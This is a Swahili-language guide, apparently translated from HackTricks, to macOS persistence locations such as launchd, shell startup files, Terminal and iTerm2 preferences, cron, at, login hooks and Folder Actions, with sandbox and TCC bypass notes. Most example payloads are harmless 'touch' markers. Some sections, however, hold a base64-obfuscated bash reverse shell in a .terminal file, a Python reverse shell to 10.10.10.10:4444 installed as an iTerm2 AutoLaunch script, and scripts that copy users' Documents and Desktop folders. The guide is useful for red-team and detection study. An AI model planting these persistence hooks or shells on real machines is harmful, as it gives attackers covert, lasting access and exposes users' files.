macOS Auto Start

Sehemu hii inategemea sana mfululizo wa blogu Beyond the good ol' LaunchAgents, lengo ni kuongeza Mahali zaidi pa Kuanzisha (ikiwa inawezekana), kuonyesha mbinu zipi bado zinafanya kazi leo na toleo jipya la macOS (13.4) na kubainisha idhini zinazohitajika.

Sandbox Bypass

Launchd

• Inafaida kwa kupita sandbox: ✅

• TCC Bypass: 🔴

Locations

• /Library/LaunchAgents

• Trigger: Reboot

• Inahitaji mzizi

• /Library/LaunchDaemons

• Trigger: Reboot

• Inahitaji mzizi

• /System/Library/LaunchAgents

• Trigger: Reboot

• Inahitaji mzizi

• /System/Library/LaunchDaemons

• Trigger: Reboot

• Inahitaji mzizi

• ~/Library/LaunchAgents

• Trigger: Relog-in

• ~/Library/LaunchDemons

• Trigger: Relog-in

Description & Exploitation

launchd ni mchakato wa kwanza unaotekelezwa na OX S kernel wakati wa kuanzisha na wa mwisho kumaliza wakati wa kuzima. Inapaswa kuwa na PID 1 kila wakati. Mchakato huu uta soma na kutekeleza mipangilio iliyoonyeshwa katika ASEP plists katika:

• /Library/LaunchAgents: Wakala wa mtumiaji waliowekwa na msimamizi

• /Library/LaunchDaemons: Daemons za mfumo mzima zilizowekwa na msimamizi

• /System/Library/LaunchAgents: Wakala wa mtumiaji waliotolewa na Apple.

• /System/Library/LaunchDaemons: Daemons za mfumo mzima zilizotolewa na Apple.

Wakati mtumiaji anapoingia, plists zilizoko katika /Users/$USER/Library/LaunchAgents na /Users/$USER/Library/LaunchDemons zinaanzishwa kwa idhini za watumiaji walioingia.

Tofauti kuu kati ya wakala na daemons ni kwamba wakala huwekwa wakati mtumiaji anaingia na daemons huwekwa wakati wa kuanzisha mfumo (kama kuna huduma kama ssh ambazo zinahitaji kutekelezwa kabla ya mtumiaji yeyote kuingia kwenye mfumo). Pia wakala wanaweza kutumia GUI wakati daemons zinahitaji kukimbia katika hali ya nyuma.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apple.someidentifier</string>
<key>ProgramArguments</key>
<array>
<string>bash -c 'touch /tmp/launched'</string> <!--Prog to execute-->
</array>
<key>RunAtLoad</key><true/> <!--Execute at system startup-->
<key>StartInterval</key>
<integer>800</integer> <!--Execute each 800s-->
<key>KeepAlive</key>
<dict>
<key>SuccessfulExit</key></false> <!--Re-execute if exit unsuccessful-->
<!--If previous is true, then re-execute in successful exit-->
</dict>
</dict>
</plist>

Kuna kesi ambapo wakala anahitaji kutekelezwa kabla ya mtumiaji kuingia, hawa huitwa PreLoginAgents. Kwa mfano, hii ni muhimu kutoa teknolojia ya msaada wakati wa kuingia. Wanaweza kupatikana pia katika /Library/LaunchAgents (angalia hapa mfano).

Orodhesha wote wakala na daemons walio pakuliwa na mtumiaji wa sasa:

launchctl list

Maelezo zaidi kuhusu launchd

launchd ni mchakato wa kwanza wa hali ya mtumiaji ambao huanzishwa kutoka kernel. Kuanzishwa kwa mchakato lazima kuwa na mafanikio na hakuwezi kutoka au kuanguka. Hata hivyo, imekingwa dhidi ya baadhi ya ishara za kuua.

Moja ya mambo ya kwanza launchd itakayofanya ni kuanzisha daemons zote kama:

• Daemons za Timer zinazotegemea wakati wa kutekelezwa:

• atd (com.apple.atrun.plist): Ina StartInterval ya dakika 30

• crond (com.apple.systemstats.daily.plist): Ina StartCalendarInterval kuanzisha saa 00:15

• Daemons za Mtandao kama:

• org.cups.cups-lpd: Inasikiliza katika TCP (SockType: stream) na SockServiceName: printer

• SockServiceName lazima iwe bandari au huduma kutoka /etc/services

• com.apple.xscertd.plist: Inasikiliza kwenye TCP katika bandari 1640

• Daemons za Njia ambazo zinafanywa wakati njia maalum inabadilika:

• com.apple.postfix.master: Inakagua njia /etc/postfix/aliases

• Daemons za Arifa za IOKit:

• com.apple.xartstorageremoted: "com.apple.iokit.matching" => { "com.apple.device-attach" => { "IOMatchLaunchStream" => 1 ...

• Bandari ya Mach:

• com.apple.xscertd-helper.plist: Inaonyesha katika kiingilio cha MachServices jina com.apple.xscertd.helper

• UserEventAgent:

• Hii ni tofauti na ile ya awali. Inafanya launchd kuanzisha programu kama majibu ya tukio maalum. Hata hivyo, katika kesi hii, binary kuu inayohusika si launchd bali /usr/libexec/UserEventAgent. Inapakia plugins kutoka folda iliyozuiwa ya SIP /System/Library/UserEventPlugins/ ambapo kila plugin inaonyesha mchakato wake wa kuanzisha katika ufunguo wa XPCEventModuleInitializer au, katika kesi ya plugins za zamani, katika kamusi ya CFPluginFactories chini ya ufunguo FB86416D-6164-2070-726F-70735C216EC0 wa Info.plist yake.

faili za kuanzisha shell

Andiko: https://theevilbit.github.io/beyond/beyond_0001/ Andiko (xterm): https://theevilbit.github.io/beyond/beyond_0018/

• Inafaida kubypass sandbox: ✅

• TCC Bypass: ✅

• Lakini unahitaji kupata programu yenye TCC bypass inayotekeleza shell inayopakia faili hizi

Mahali

• ~/.zshrc, ~/.zlogin, ~/.zshenv.zwc, ~/.zshenv, ~/.zprofile

• Kichocheo: Fungua terminal na zsh

• /etc/zshenv, /etc/zprofile, /etc/zshrc, /etc/zlogin

• Kichocheo: Fungua terminal na zsh

• Inahitajika root

• ~/.zlogout

• Kichocheo: Toka kwenye terminal na zsh

• /etc/zlogout

• Kichocheo: Toka kwenye terminal na zsh

• Inahitajika root

• Huenda kuna zaidi katika: man zsh

• ~/.bashrc

• Kichocheo: Fungua terminal na bash

• /etc/profile (haikufanya kazi)

• ~/.profile (haikufanya kazi)

• ~/.xinitrc, ~/.xserverrc, /opt/X11/etc/X11/xinit/xinitrc.d/

• Kichocheo: Inatarajiwa kuanzisha na xterm, lakini haijasanidiwa na hata baada ya kusanidiwa kosa hili linatolewa: xterm: DISPLAY is not set

Maelezo & Ukatili

Wakati wa kuanzisha mazingira ya shell kama zsh au bash, faili fulani za kuanzisha zinafanywa. macOS kwa sasa inatumia /bin/zsh kama shell ya default. Shell hii inapatikana moja kwa moja wakati programu ya Terminal inapoanzishwa au wakati kifaa kinapofikiwa kupitia SSH. Ingawa bash na sh pia zipo katika macOS, zinahitaji kuitwa wazi ili kutumika.

Ukurasa wa mtu wa zsh, ambao tunaweza kusoma kwa man zsh una maelezo marefu ya faili za kuanzisha.

# Example executino via ~/.zshrc
echo "touch /tmp/hacktricks" >> ~/.zshrc

Re-opened Applications

Writeup: https://theevilbit.github.io/beyond/beyond_0021/

• Inasaidia kupita sandbox: ✅

• TCC bypass: 🔴

Location

• ~/Library/Preferences/ByHost/com.apple.loginwindow.<UUID>.plist

• Trigger: Anzisha upya kufungua programu

Description & Exploitation

Programu zote za kufungua tena ziko ndani ya plist ~/Library/Preferences/ByHost/com.apple.loginwindow.<UUID>.plist

Hivyo, ili kufanya programu za kufungua tena zianzishe yako, unahitaji tu kuongeza programu yako kwenye orodha.

UUID inaweza kupatikana kwa kuorodhesha hiyo directory au kwa ioreg -rd1 -c IOPlatformExpertDevice | awk -F'"' '/IOPlatformUUID/{print $4}'

Ili kuangalia programu ambazo zitafunguliwa tena unaweza kufanya:

defaults -currentHost read com.apple.loginwindow TALAppsToRelaunchAtLogin
#or
plutil -p ~/Library/Preferences/ByHost/com.apple.loginwindow.<UUID>.plist

Ili kuongeza programu kwenye orodha hii unaweza kutumia:

# Adding iTerm2
/usr/libexec/PlistBuddy -c "Add :TALAppsToRelaunchAtLogin: dict" \
-c "Set :TALAppsToRelaunchAtLogin:$:BackgroundState 2" \
-c "Set :TALAppsToRelaunchAtLogin:$:BundleID com.googlecode.iterm2" \
-c "Set :TALAppsToRelaunchAtLogin:$:Hide 0" \
-c "Set :TALAppsToRelaunchAtLogin:$:Path /Applications/iTerm.app" \
~/Library/Preferences/ByHost/com.apple.loginwindow.<UUID>.plist

Terminal Preferences

• Inatumika kubypass sandbox: ✅

• TCC bypass: ✅

• Terminal inatumika kuwa na ruhusa za FDA za mtumiaji anayetumia

Location

• ~/Library/Preferences/com.apple.Terminal.plist

• Trigger: Fungua Terminal

Description & Exploitation

Katika ~/Library/Preferences zinahifadhiwa mapendeleo ya mtumiaji katika Programu. Baadhi ya mapendeleo haya yanaweza kuwa na usanidi wa kutekeleza programu/scripts nyingine.

Kwa mfano, Terminal inaweza kutekeleza amri katika Startup:

Usanidi huu unajitokeza katika faili ~/Library/Preferences/com.apple.Terminal.plist kama ifuatavyo:

[...]
"Window Settings" => {
"Basic" => {
"CommandString" => "touch /tmp/terminal_pwn"
"Font" => {length = 267, bytes = 0x62706c69 73743030 d4010203 04050607 ... 00000000 000000cf }
"FontAntialias" => 1
"FontWidthSpacing" => 1.004032258064516
"name" => "Basic"
"ProfileCurrentVersion" => 2.07
"RunCommandAsShell" => 0
"type" => "Window Settings"
}
[...]

Hivyo, ikiwa plist ya mapendeleo ya terminal katika mfumo inaweza kuandikwa upya, basi open kazi inaweza kutumika kufungua terminal na amri hiyo itatekelezwa.

Unaweza kuongeza hii kutoka kwa cli na:

# Add
/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"CommandString\" 'touch /tmp/terminal-start-command'" $HOME/Library/Preferences/com.apple.Terminal.plist
/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"RunCommandAsShell\" 0" $HOME/Library/Preferences/com.apple.Terminal.plist

# Remove
/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"CommandString\" ''" $HOME/Library/Preferences/com.apple.Terminal.plist

Terminal Scripts / Other file extensions

• Inasaidia kupita sandbox: ✅

• Kupita TCC: ✅

• Matumizi ya Terminal yana FDA ruhusa za mtumiaji anayezitumia

Location

• Popote

• Trigger: Fungua Terminal

Description & Exploitation

Ikiwa unaunda .terminal script na kufungua, programu ya Terminal itaitwa moja kwa moja kutekeleza amri zilizoonyeshwa humo. Ikiwa programu ya Terminal ina ruhusa maalum (kama TCC), amri yako itatekelezwa kwa ruhusa hizo maalum.

Jaribu na:

# Prepare the payload
cat > /tmp/test.terminal << EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CommandString</key>
<string>mkdir /tmp/Documents; cp -r ~/Documents /tmp/Documents;</string>
<key>ProfileCurrentVersion</key>
<real>2.0600000000000001</real>
<key>RunCommandAsShell</key>
<false/>
<key>name</key>
<string>exploit</string>
<key>type</key>
<string>Window Settings</string>
</dict>
</plist>
EOF

# Trigger it
open /tmp/test.terminal

# Use something like the following for a reverse shell:
<string>echo -n "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYxOw==" | base64 -d | bash;</string>

You could also use the extensions .command, .tool, with regular shell scripts content and they will be also opened by Terminal.

Audio Plugins

Writeup: https://theevilbit.github.io/beyond/beyond_0013/ Writeup: https://posts.specterops.io/audio-unit-plug-ins-896d3434a882

• Inatumika kupita sandbox: ✅

• TCC bypass: 🟠

• Unaweza kupata ufikiaji wa ziada wa TCC

Location

• /Library/Audio/Plug-Ins/HAL

• Inahitaji root

• Trigger: Restart coreaudiod au kompyuta

• /Library/Audio/Plug-ins/Components

• Inahitaji root

• Trigger: Restart coreaudiod au kompyuta

• ~/Library/Audio/Plug-ins/Components

• Trigger: Restart coreaudiod au kompyuta

• /System/Library/Components

• Inahitaji root

• Trigger: Restart coreaudiod au kompyuta

Description

Kulingana na maandiko ya awali inawezekana kukusanya baadhi ya plugins za sauti na kuzipakia.

QuickLook Plugins

Writeup: https://theevilbit.github.io/beyond/beyond_0028/

• Inatumika kupita sandbox: ✅

• TCC bypass: 🟠

• Unaweza kupata ufikiaji wa ziada wa TCC

Location

• /System/Library/QuickLook

• /Library/QuickLook

• ~/Library/QuickLook

• /Applications/AppNameHere/Contents/Library/QuickLook/

• ~/Applications/AppNameHere/Contents/Library/QuickLook/

Description & Exploitation

QuickLook plugins zinaweza kutekelezwa unapofanya kuchochea muonekano wa faili (bonyeza nafasi na faili iliyo chaguliwa kwenye Finder) na plugin inayounga mkono aina hiyo ya faili imewekwa.

Inawezekana kukusanya plugin yako ya QuickLook, kuiweka katika moja ya maeneo ya awali ili kuipakia na kisha kwenda kwenye faili inayounga mkono na kubonyeza nafasi ili kuichochea.

Login/Logout Hooks

Writeup: https://theevilbit.github.io/beyond/beyond_0022/

• Inatumika kupita sandbox: ✅

• TCC bypass: 🔴

Location

• Unahitaji kuwa na uwezo wa kutekeleza kitu kama defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh

• Lokated katika ~/Library/Preferences/com.apple.loginwindow.plist

Zimeondolewa lakini zinaweza kutumika kutekeleza amri wakati mtumiaji anapoingia.

cat > $HOME/hook.sh << EOF
#!/bin/bash
echo 'My is: \`id\`' > /tmp/login_id.txt
EOF
chmod +x $HOME/hook.sh
defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh
defaults write com.apple.loginwindow LogoutHook /Users/$USER/hook.sh

Hali hii inahifadhiwa katika /Users/$USER/Library/Preferences/com.apple.loginwindow.plist

defaults read /Users/$USER/Library/Preferences/com.apple.loginwindow.plist
{
LoginHook = "/Users/username/hook.sh";
LogoutHook = "/Users/username/hook.sh";
MiniBuddyLaunch = 0;
TALLogoutReason = "Shut Down";
TALLogoutSavesState = 0;
oneTimeSSMigrationComplete = 1;
}

Ili kuifuta:

defaults delete com.apple.loginwindow LoginHook
defaults delete com.apple.loginwindow LogoutHook

The root user one is stored in /private/var/root/Library/Preferences/com.apple.loginwindow.plist

Conditional Sandbox Bypass

Cron

Writeup: https://theevilbit.github.io/beyond/beyond_0004/

• Inafaida kwa bypass sandbox: ✅

• Hata hivyo, unahitaji kuwa na uwezo wa kutekeleza crontab binary

• Au uwe root

• TCC bypass: 🔴

Location

• /usr/lib/cron/tabs/, /private/var/at/tabs, /private/var/at/jobs, /etc/periodic/

• Root inahitajika kwa ufikiaji wa moja kwa moja wa kuandika. Hakuna root inahitajika ikiwa unaweza kutekeleza crontab <file>

• Trigger: Inategemea kazi ya cron

Description & Exploitation

Orodhesha kazi za cron za mtumiaji wa sasa na:

crontab -l

You can also see all the cron jobs of the users in /usr/lib/cron/tabs/ and /var/at/tabs/ (needs root).

Katika MacOS, folda kadhaa zinazotekeleza skripti kwa mara fulani zinaweza kupatikana katika:

# The one with the cron jobs is /usr/lib/cron/tabs/
ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /etc/periodic/

Hapo unaweza kupata cron jobs za kawaida, at jobs (hazitumiki sana) na periodic jobs (zinatumika hasa kwa kusafisha faili za muda). Periodic za kila siku zinaweza kutekelezwa kwa mfano na: periodic daily.

Ili kuongeza user cronjob programatically inawezekana kutumia:

echo '* * * * * /bin/bash -c "touch /tmp/cron3"' > /tmp/cron
crontab /tmp/cron

iTerm2

Writeup: https://theevilbit.github.io/beyond/beyond_0002/

• Inatumika kupita sandbox: ✅

• TCC bypass: ✅

• iTerm2 ilikuwa na ruhusa za TCC zilizotolewa

Locations

• ~/Library/Application Support/iTerm2/Scripts/AutoLaunch

• Trigger: Fungua iTerm

• ~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt

• Trigger: Fungua iTerm

• ~/Library/Preferences/com.googlecode.iterm2.plist

• Trigger: Fungua iTerm

Description & Exploitation

Scripts zilizohifadhiwa katika ~/Library/Application Support/iTerm2/Scripts/AutoLaunch zitatekelezwa. Kwa mfano:

cat > "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh" << EOF
#!/bin/bash
touch /tmp/iterm2-autolaunch
EOF

chmod +x "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh"

au:

cat > "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.py" << EOF
#!/usr/bin/env python3
import iterm2,socket,subprocess,os

async def main(connection):
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.10.10',4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['zsh','-i']);
async with iterm2.CustomControlSequenceMonitor(
connection, "shared-secret", r'^create-window$') as mon:
while True:
match = await mon.async_get()
await iterm2.Window.async_create(connection)

iterm2.run_forever(main)
EOF

Skiripti ~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt pia litatekelezwa:

do shell script "touch /tmp/iterm2-autolaunchscpt"

Mipangilio ya iTerm2 iliyoko ~/Library/Preferences/com.googlecode.iterm2.plist inaweza kuonyesha amri ya kutekeleza wakati terminal ya iTerm2 inafunguliwa.

Mipangilio hii inaweza kuwekewa mipangilio katika mipangilio ya iTerm2:

Na amri inaonyeshwa katika mipangilio:

plutil -p com.googlecode.iterm2.plist
{
[...]
"New Bookmarks" => [
0 => {
[...]
"Initial Text" => "touch /tmp/iterm-start-command"

Unaweza kuweka amri ya kutekeleza na:

# Add
/usr/libexec/PlistBuddy -c "Set :\"New Bookmarks\":0:\"Initial Text\" 'touch /tmp/iterm-start-command'" $HOME/Library/Preferences/com.googlecode.iterm2.plist

# Call iTerm
open /Applications/iTerm.app/Contents/MacOS/iTerm2

# Remove
/usr/libexec/PlistBuddy -c "Set :\"New Bookmarks\":0:\"Initial Text\" ''" $HOME/Library/Preferences/com.googlecode.iterm2.plist

xbar

Writeup: https://theevilbit.github.io/beyond/beyond_0007/

• Inasaidia kupita sandbox: ✅

• Lakini xbar lazima iwe imewekwa

• TCC bypass: ✅

• Inahitaji ruhusa za Uwezo

Mahali

• ~/Library/Application\ Support/xbar/plugins/

• Kichocheo: Mara xbar inapotekelezwa

Maelezo

Ikiwa programu maarufu xbar imewekwa, inawezekana kuandika script ya shell katika ~/Library/Application\ Support/xbar/plugins/ ambayo itatekelezwa wakati xbar inapoanzishwa:

cat > "$HOME/Library/Application Support/xbar/plugins/a.sh" << EOF
#!/bin/bash
touch /tmp/xbar
EOF
chmod +x "$HOME/Library/Application Support/xbar/plugins/a.sh"

Hammerspoon

Writeup: https://theevilbit.github.io/beyond/beyond_0008/

• Inatumika kupita sandbox: ✅

• Lakini Hammerspoon lazima iwe imewekwa

• TCC bypass: ✅

• Inahitaji ruhusa za Accessibility

Location

• ~/.hammerspoon/init.lua

• Trigger: Mara Hammerspoon inapotekelezwa

Description

Hammerspoon inatumika kama jukwaa la automatisering kwa macOS, ikitumia LUA scripting language kwa shughuli zake. Kwa hakika, inasaidia uunganisho wa msimbo kamili wa AppleScript na utekelezaji wa scripts za shell, ikiongeza uwezo wake wa scripting kwa kiasi kikubwa.

App inatafuta faili moja, ~/.hammerspoon/init.lua, na inapozinduliwa script itatekelezwa.

mkdir -p "$HOME/.hammerspoon"
cat > "$HOME/.hammerspoon/init.lua" << EOF
hs.execute("/Applications/iTerm.app/Contents/MacOS/iTerm2")
EOF

BetterTouchTool

• Inatumika kubypass sandbox: ✅

• Lakini BetterTouchTool lazima iwe imewekwa

• TCC bypass: ✅

• Inahitaji ruhusa za Automation-Shortcuts na Accessibility

Location

• ~/Library/Application Support/BetterTouchTool/*

Chombo hiki kinaruhusu kuashiria programu au scripts za kutekeleza wakati baadhi ya shortcuts zinapobanwa. Mshambuliaji anaweza kuweza kuunda shortcut na hatua za kutekeleza katika database ili kufanya itekeleze msimbo wa kiholela (shortcut inaweza kuwa kubonyeza tu funguo).

Alfred

• Inatumika kubypass sandbox: ✅

• Lakini Alfred lazima iwe imewekwa

• TCC bypass: ✅

• Inahitaji ruhusa za Automation, Accessibility na hata Full-Disk access

Location

• ???

Inaruhusu kuunda workflows ambazo zinaweza kutekeleza msimbo wakati masharti fulani yanatimizwa. Inawezekana kwa mshambuliaji kuunda faili ya workflow na kumfanya Alfred aifanye (inahitajika kulipa toleo la premium ili kutumia workflows).

SSHRC

Writeup: https://theevilbit.github.io/beyond/beyond_0006/

• Inatumika kubypass sandbox: ✅

• Lakini ssh inahitaji kuwezeshwa na kutumika

• TCC bypass: ✅

• SSH inahitaji kuwa na FDA access

Location

• ~/.ssh/rc

• Trigger: Ingia kupitia ssh

• /etc/ssh/sshrc

• Inahitaji root

• Trigger: Ingia kupitia ssh

sudo systemsetup -setremotelogin on

Maelezo & Ukatili

Kwa kawaida, isipokuwa PermitUserRC no katika /etc/ssh/sshd_config, wakati mtumiaji anapoingia kupitia SSH skripti /etc/ssh/sshrc na ~/.ssh/rc zitatekelezwa.

Vitu vya Kuingia

Andiko: https://theevilbit.github.io/beyond/beyond_0003/

• Inafaida kubypass sandbox: ✅

• Lakini unahitaji kutekeleza osascript na args

• TCC bypass: 🔴

Mahali

• ~/Library/Application Support/com.apple.backgroundtaskmanagementagent

• Kichocheo: Kuingia

• Payload ya ukatili inahifadhiwa ikitumia osascript

• /var/db/com.apple.xpc.launchd/loginitems.501.plist

• Kichocheo: Kuingia

• Mzizi unahitajika

Maelezo

Katika Mipangilio ya Mfumo -> Watumiaji & Makundi -> Vitu vya Kuingia unaweza kupata vitu vitakavyotekelezwa wakati mtumiaji anapoingia. Inawezekana kuorodhesha, kuongeza na kuondoa kutoka kwa mstari wa amri:

#List all items:
osascript -e 'tell application "System Events" to get the name of every login item'

#Add an item:
osascript -e 'tell application "System Events" to make login item at end with properties {path:"/path/to/itemname", hidden:false}'

#Remove an item:
osascript -e 'tell application "System Events" to delete login item "itemname"'

These items are stored in the file ~/Library/Application Support/com.apple.backgroundtaskmanagementagent

Vitu vya kuingia vinaweza pia kuonyeshwa kwa kutumia API SMLoginItemSetEnabled ambayo itahifadhi usanidi katika /var/db/com.apple.xpc.launchd/loginitems.501.plist

ZIP kama Kitu cha Kuingia

(Tazama sehemu ya awali kuhusu Vitu vya Kuingia, hii ni nyongeza)

Ikiwa unahifadhi faili ya ZIP kama Kitu cha Kuingia, Archive Utility itafungua na ikiwa zip ilikuwa kwa mfano imehifadhiwa katika ~/Library na ilikuwa na Folda LaunchAgents/file.plist yenye backdoor, folda hiyo itaundwa (sio kwa kawaida) na plist itaongezwa ili wakati mtumiaji atakaporudi kuingia tena, backdoor iliyoonyeshwa katika plist itatekelezwa.

Chaguo lingine lingekuwa kuunda faili .bash_profile na .zshenv ndani ya HOME ya mtumiaji ili ikiwa folda ya LaunchAgents tayari ipo, mbinu hii bado itafanya kazi.

At

Writeup: https://theevilbit.github.io/beyond/beyond_0014/

• Inasaidia kupita sandbox: ✅

• Lakini unahitaji kutekeleza at na lazima iwe imewezeshwa

• TCC bypass: 🔴

Mahali

• Unahitaji kutekeleza at na lazima iwe imewezeshwa

Maelezo

at kazi zimeundwa kwa ajili ya kuandaa kazi za mara moja kutekelezwa kwa nyakati fulani. Tofauti na kazi za cron, kazi za at zinaondolewa kiotomatiki baada ya kutekelezwa. Ni muhimu kutambua kwamba kazi hizi ni za kudumu wakati wa upya wa mfumo, na kuziweka kama wasiwasi wa usalama chini ya hali fulani.

Kwa kawaida zime zimezuiliwa lakini mtumiaji root anaweza kuziwezesha hizi kwa:

sudo launchctl load -F /System/Library/LaunchDaemons/com.apple.atrun.plist

Hii itaunda faili ndani ya saa 1:

echo "echo 11 > /tmp/at.txt" | at now+1

Angalia foleni ya kazi kwa kutumia atq:

sh-3.2# atq
26	Tue Apr 27 00:46:00 2021
22	Wed Apr 28 00:29:00 2021

Juu tunaweza kuona kazi mbili zilizopangwa. Tunaweza kuchapisha maelezo ya kazi kwa kutumia at -c JOBNUMBER

sh-3.2# at -c 26
#!/bin/sh
# atrun uid=0 gid=0
# mail csaby 0
umask 22
SHELL=/bin/sh; export SHELL
TERM=xterm-256color; export TERM
USER=root; export USER
SUDO_USER=csaby; export SUDO_USER
SUDO_UID=501; export SUDO_UID
SSH_AUTH_SOCK=/private/tmp/com.apple.launchd.co51iLHIjf/Listeners; export SSH_AUTH_SOCK
__CF_USER_TEXT_ENCODING=0x0:0:0; export __CF_USER_TEXT_ENCODING
MAIL=/var/mail/root; export MAIL
PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin; export PATH
PWD=/Users/csaby; export PWD
SHLVL=1; export SHLVL
SUDO_COMMAND=/usr/bin/su; export SUDO_COMMAND
HOME=/var/root; export HOME
LOGNAME=root; export LOGNAME
LC_CTYPE=UTF-8; export LC_CTYPE
SUDO_GID=20; export SUDO_GID
_=/usr/bin/at; export _
cd /Users/csaby || {
echo 'Execution directory inaccessible' >&2
exit 1
}
unset OLDPWD
echo 11 > /tmp/at.txt

The job files can be found at /private/var/at/jobs/

sh-3.2# ls -l /private/var/at/jobs/
total 32
-rw-r--r--  1 root  wheel    6 Apr 27 00:46 .SEQ
-rw-------  1 root  wheel    0 Apr 26 23:17 .lockfile
-r--------  1 root  wheel  803 Apr 27 00:46 a00019019bdcd2
-rwx------  1 root  wheel  803 Apr 27 00:46 a0001a019bdcd2

The filename contains the queue, the job number, and the time it’s scheduled to run. For example let’s take a loot at a0001a019bdcd2.

• a - hii ni foleni

• 0001a - nambari ya kazi katika hex, 0x1a = 26

• 019bdcd2 - muda katika hex. Inawakilisha dakika zilizopita tangu epoch. 0x019bdcd2 ni 26991826 katika desimali. Ikiwa tutazidisha kwa 60 tunapata 1619509560, ambayo ni GMT: 2021. Aprili 27., Jumanne 7:46:00.

If we print the job file, we find that it contains the same information we got using at -c.

Folder Actions

Writeup: https://theevilbit.github.io/beyond/beyond_0024/ Writeup: https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d

• Inatumika kupita sandbox: ✅

• Lakini unahitaji kuwa na uwezo wa kuita osascript na hoja ili kuwasiliana na System Events ili uweze kuunda Folder Actions

• TCC bypass: 🟠

• Ina ruhusa za msingi za TCC kama Desktop, Documents na Downloads

Location

• /Library/Scripts/Folder Action Scripts

• Msingi unahitajika

• Trigger: Ufikiaji wa folda iliyoainishwa

• ~/Library/Scripts/Folder Action Scripts

• Trigger: Ufikiaji wa folda iliyoainishwa

Description & Exploitation

Folder Actions ni scripts zinazozinduliwa kiotomatiki na mabadiliko katika folda kama kuongeza, kuondoa vitu, au vitendo vingine kama kufungua au kubadilisha ukubwa wa dirisha la folda. Vitendo hivi vinaweza kutumika kwa kazi mbalimbali, na vinaweza kuzinduliwa kwa njia tofauti kama kutumia UI ya Finder au amri za terminal.

Ili kuanzisha Folder Actions, una chaguzi kama:

1. Kuunda mchakato wa Folder Action na Automator na kuisakinisha kama huduma.

2. Kuunganisha script kwa mikono kupitia Folder Actions Setup katika menyu ya muktadha ya folda.

3. Kutumia OSAScript kutuma ujumbe wa Apple Event kwa System Events.app kwa kuanzisha Folder Action kwa njia ya programu.

• Njia hii ni muhimu sana kwa kuingiza kitendo ndani ya mfumo, ikitoa kiwango cha kudumu.

The following script is an example of what can be executed by a Folder Action:

// source.js
var app = Application.currentApplication();
app.includeStandardAdditions = true;
app.doShellScript("touch /tmp/folderaction.txt");
app.doShellScript("touch ~/Desktop/folderaction.txt");
app.doShellScript("mkdir /tmp/asd123");
app.doShellScript("cp -R ~/Desktop /tmp/asd123");

Ili kufanya script hapo juu iweze kutumika na Folder Actions, itengeneze kwa kutumia:

osacompile -l JavaScript -o folder.scpt source.js

Baada ya script kukusanywa, weka Vitendo vya Folda kwa kutekeleza script iliyo hapa chini. Script hii itawawezesha Vitendo vya Folda kwa ujumla na kuunganisha kwa maalum script iliyokusanywa hapo awali kwenye folda ya Desktop.

// Enabling and attaching Folder Action
var se = Application("System Events");
se.folderActionsEnabled = true;
var myScript = se.Script({name: "source.js", posixPath: "/tmp/source.js"});
var fa = se.FolderAction({name: "Desktop", path: "/Users/username/Desktop"});
se.folderActions.push(fa);
fa.scripts.push(myScript);

Kimbia skripti ya usanidi na:

osascript -l JavaScript /Users/username/attach.scpt

• Hii ndiyo njia ya kutekeleza uthabiti huu kupitia GUI:

Hii ndiyo script itakayotekelezwa:

var app = Application.currentApplication();
app.includeStandardAdditions = true;
app.doShellScript("touch /tmp/folderaction.txt");
app.doShellScript("touch ~/Desktop/folderaction.txt");
app.doShellScript("mkdir /tmp/asd123");
app.doShellScript("cp -R ~/Desktop /tmp/asd123");

Ihamashe kwa: osacompile -l JavaScript -o folder.scpt source.js

Hamisha kwenda:

mkdir -p "$HOME/Library/Scripts/Folder Action Scripts"
mv /tmp/folder.scpt "$HOME/Library/Scripts/Folder Action Scripts"

Kisha, fungua programu ya Folder Actions Setup, chagua folda unayotaka kufuatilia na uchague katika kesi yako folder.scpt (katika kesi yangu niliiita output2.scp):

Sasa, ukifungua folda hiyo na Finder, skripti yako itatekelezwa.

Usanidi huu ulihifadhiwa katika plist iliyoko ~/Library/Preferences/com.apple.FolderActionsDispatcher.plist katika muundo wa base64.

Sasa, hebu jaribu kuandaa kudumu hii bila ufikiaji wa GUI:

1. Nakili ~/Library/Preferences/com.apple.FolderActionsDispatcher.plist hadi /tmp ili kuifanya kuwa nakala ya akiba:

• cp ~/Library/Preferences/com.apple.FolderActionsDispatcher.plist /tmp

2. Ondoa Folder Actions ulizoweka hivi karibuni:

Sasa kwamba tuna mazingira tupu

3. Nakili faili ya akiba: cp /tmp/com.apple.FolderActionsDispatcher.plist ~/Library/Preferences/

4. Fungua Folder Actions Setup.app ili kutumia usanidi huu: open "/System/Library/CoreServices/Applications/Folder Actions Setup.app/"

Dock shortcuts

Andiko: https://theevilbit.github.io/beyond/beyond_0027/

• Inasaidia kupita sandbox: ✅

• Lakini unahitaji kuwa na programu mbaya iliyosakinishwa ndani ya mfumo

• TCC bypass: 🔴

Mahali

• ~/Library/Preferences/com.apple.dock.plist

• Kichocheo: Wakati mtumiaji anabofya kwenye programu ndani ya dock

Maelezo & Ukatili

Programu zote zinazotokea katika Dock zimeainishwa ndani ya plist: ~/Library/Preferences/com.apple.dock.plist

Inawezekana kuongeza programu kwa kutumia tu:

